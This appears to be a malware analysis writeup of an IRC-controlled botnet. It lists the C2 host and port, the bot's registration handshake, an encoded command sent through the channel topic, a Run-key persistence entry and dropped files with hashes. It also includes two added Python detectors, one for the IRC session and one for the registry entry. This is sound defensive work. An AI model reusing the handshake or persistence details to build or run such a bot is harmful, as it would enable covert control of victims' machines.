174.127.127.137.static.midphase.com (Burimi's botnet, hosted in the United States by Providence Hosting Services Inc)

Remote Host      Port Number
174.127.127.137  81

The command-and-control channel is plain IRC carried on TCP port 81 rather than the usual 6667, so a detection keyed only on the standard IRC port will miss it.

Registration sequence sent by the bot (the nick encodes country, OS and host name, with COMPUTERNAME standing for the infected machine's name, followed by a random suffix):

NICK n[USA|XP|COMPUTERNAME]xvfnrcj
USER n "" "lol" :n
JOIN #bul#
PONG 422
PONG :request4.not.found

Now talking in #bul#
Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ]
Topic By: [ n ]
(abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
(RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/

The channel topic and the messages from abc and RDP all carry the same .d command; its argument is a slash-separated list of small integers, which the post does not decode.
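The handshake and the topic-delivered command are what a network sensor can key on. The following Python script is an added example, not code from the original post: it walks a text capture of the IRC exchange (a constructed sample modelled on the lines above; the host name WIN-7H2KQ, the server numerics and the second channel are assumed for illustration), flags the three handshake markers (the n[country|os|host] nick format, the "lol" realname, the join to #bul#) and pulls the .d commands out of the channel topic and PRIVMSGs without attempting to decode their numeric argument.

```python
"""Flag the IRC bot handshake above and pull the dot-commands it receives.

Added example; not code from the original post. Input is a text capture of
the IRC exchange, one message per line, prefixed "C: " (client/bot) or
"S: " (server).
"""
import re
from dataclasses import dataclass, field

# Handshake markers taken from the post: nick n[country|os|host] plus a random
# lowercase suffix, USER carrying the realname "lol", and a join to #bul#.
NICK_RE = re.compile(r"^NICK n\[[A-Z]{2,3}\|[A-Za-z0-9]+\|[^\]]+\][a-z0-9]+$")
USER_RE = re.compile(r'^USER \S+ "" "lol" :')
JOIN_RE = re.compile(r"^JOIN #bul#\s*$")

# Server side: RPL_TOPIC (332) and PRIVMSG are the two places the bot reads
# commands from (channel topic on join, then operator messages).
TOPIC_RE = re.compile(r"^:\S+ 332 \S+ (#\S+) :(.*)$")
PRIVMSG_RE = re.compile(r"^:(\S+?)!\S+ PRIVMSG (#\S+) :(.*)$")

# ".d /99/106/..." : dot-command plus a slash-delimited integer list. Only the
# structure is parsed; the post gives no key for the numbers, so no decoding.
CMD_RE = re.compile(r"\.([a-z]+)\s+((?:/\d+)+/?)")

# Constructed sample session. NICK/USER/JOIN and the topic mirror the post;
# the host name WIN-7H2KQ, the server numerics and the #chat line are assumed.
SAMPLE_SESSION = """\
C: NICK n[USA|XP|WIN-7H2KQ]xvfnrcj
C: USER n "" "lol" :n
S: PING :request4.not.found
C: PONG :request4.not.found
S: :174.127.127.137 001 n[USA|XP|WIN-7H2KQ]xvfnrcj :Welcome
C: JOIN #bul#
S: :174.127.127.137 332 n[USA|XP|WIN-7H2KQ]xvfnrcj #bul# :13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
S: :abc!abc@host PRIVMSG #bul# :.d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
S: :alice!u@host PRIVMSG #chat :hello everyone
"""


@dataclass
class Command:
    source: str       # "topic" or the sending nick
    channel: str
    name: str         # e.g. "d"
    values: list[int]


@dataclass
class SessionReport:
    indicators: set[str] = field(default_factory=set)
    channels: set[str] = field(default_factory=set)
    commands: list[Command] = field(default_factory=list)

    @property
    def is_bot(self) -> bool:
        # Two independent markers, not one: a lone odd nick or realname is
        # not enough to call a session hostile.
        return len(self.indicators) >= 2


def parse_command(text: str):
    """Return (name, [ints]) for a dot-command found in text, else None."""
    m = CMD_RE.search(text)
    if not m:
        return None
    values = [int(v) for v in m.group(2).strip("/").split("/")]
    return m.group(1), values


def parse_session(capture: str) -> SessionReport:
    report = SessionReport()
    for raw in capture.splitlines():
        direction, _, line = raw.partition(": ")
        if direction == "C":
            if NICK_RE.match(line):
                report.indicators.add("nick-format")
            elif USER_RE.match(line):
                report.indicators.add("user-realname-lol")
            elif JOIN_RE.match(line):
                report.indicators.add("join-#bul#")
                report.channels.add("#bul#")
            continue
        if direction != "S":
            continue
        m = TOPIC_RE.match(line)
        if m:
            channel, topic = m.groups()
            report.channels.add(channel)
            cmd = parse_command(topic)
            if cmd:
                report.commands.append(Command("topic", channel, *cmd))
            continue
        m = PRIVMSG_RE.match(line)
        if m:
            nick, channel, text = m.groups()
            cmd = parse_command(text)
            if cmd:
                report.commands.append(Command(nick, channel, *cmd))
    return report


if __name__ == "__main__":
    r = parse_session(SAMPLE_SESSION)
    print("bot session:", r.is_bot, sorted(r.indicators))
    for c in r.commands:
        print(f"{c.channel} <{c.source}> .{c.name}: {len(c.values)} values, first {c.values[:4]}")
```

Running it on the sample reports a bot session with all three markers and two identical .d commands, one from the topic and one from abc. The two-marker threshold is deliberate: the nick template and the "lol" realname are each cheap for the operator to change, so a sensor should fire on the combination and treat the .d payload as the part worth capturing for later analysis.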

Registry Modifications

* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + WindowsDriverControl = "%AppData%\C-76947-8457-2745\wincdrkfk.exe"

so that wincdrkfk.exe runs every time the infected user logs on (a Run value under HKEY_CURRENT_USER fires at that user's logon, not at system boot).
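To hunt for this persistence entry across collected hosts, the Run key can be exported with reg export and checked offline. The Python script below is an added example, not code from the original post: it parses the Windows .reg text format, normalises concrete profile paths back to the %AppData% form used above, and reports exact matches on the value name and file name from the post separately from the weaker "autostarts from the roaming profile" heuristic. The export it runs on is constructed; the OneDrive, SecurityHealth and Spotify entries are benign filler assumed for illustration.

```python
"""Hunt the Run-key persistence above in an exported registry key.

Added example; not code from the original post. Parses Windows .reg text
(what `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`
writes) so the check runs offline on collected exports rather than live.
"""
import re
from dataclasses import dataclass

# Indicators from the post.
IOC_VALUE_NAMES = {"windowsdrivercontrol"}
IOC_FILENAMES = {"wincdrkfk.exe"}

# Constructed .reg export. The WindowsDriverControl entry is the post's, with
# %AppData% written out as a concrete profile path; the other three entries
# are benign filler assumed for illustration.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"WindowsDriverControl"="C:\\Users\\victim\\AppData\\Roaming\\C-76947-8457-2745\\wincdrkfk.exe"
"Spotify"="C:\\Users\\victim\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"="value" lines (REG_SZ). hex(2)/hex entries (REG_EXPAND_SZ, binary)
# are not handled and are silently skipped.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Concrete roaming-profile prefixes that sandbox reports print as %AppData%.
PROFILE_APPDATA = [
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming", re.I),
    re.compile(r"^[a-z]:\\documents and settings\\[^\\]+\\application data", re.I),
]


@dataclass
class Finding:
    key: str
    name: str
    image: str
    reasons: list


def unescape(s: str) -> str:
    # .reg strings escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def image_path(command: str) -> str:
    """Executable part of a Run value: quoted path, else up to '.exe', else first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.*?\.exe)", command, re.I)
    if m:
        return m.group(1)
    return command.split()[0] if command else ""


def normalise(path: str) -> str:
    """Fold a concrete roaming-profile path back to the %AppData% form."""
    for pat in PROFILE_APPDATA:
        path = pat.sub("%AppData%", path, count=1)
    return path


def findings(export_text: str) -> list:
    results = []
    key = None
    for raw in export_text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, value = unescape(m.group(1)), unescape(m.group(2))
        image = normalise(image_path(value))
        reasons = []
        if name.lower() in IOC_VALUE_NAMES:
            reasons.append("ioc:value-name")
        if image.rsplit("\\", 1)[-1].lower() in IOC_FILENAMES:
            reasons.append("ioc:filename")
        if image.lower().startswith("%appdata%"):
            # Weak signal on its own: plenty of legitimate software autostarts
            # from the roaming profile, so this only ranks, it does not convict.
            reasons.append("heuristic:runs-from-appdata")
        if reasons:
            results.append(Finding(key, name, image, reasons))
    return results


if __name__ == "__main__":
    for f in findings(SAMPLE_REG_EXPORT):
        print(f"{f.name}: {f.image}  [{', '.join(f.reasons)}]")
```

On the sample export the WindowsDriverControl entry comes back with both exact indicators plus the heuristic, while Spotify is reported on the heuristic alone; that separation is what lets an analyst triage a fleet-wide export without chasing every program that starts from %AppData%.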

File System Modifications

* The following files were created in the system:

#  Filename(s)                                  File Size      File Hash
1  %AppData%\C-76947-8457-2745\wincdrkfk.exe    155,648 bytes  MD5: 0x4E3DA73627348C20996F63BBC24275F9
   [file and pathname of the sample #1]                        SHA-1: 0x57FCFAB2D3EAF49EB91EA17CE6E66B44E69297B4
2  %System%\winrtsnr.txt                        0 bytes        MD5: 0xD41D8CD98F00B204E9800998ECF8427E
                                                               SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709

File 2 is empty, so its MD5 and SHA-1 are simply the digests of zero-length input and match every empty file; the path %System%\winrtsnr.txt is the usable indicator, not the hashes.

Hosting information (whois lookup):
http://www.dnsstuff.com/tools/whois/?tool_id=66&token=&toolhandler_redirect=0&ip=174.127.127.137
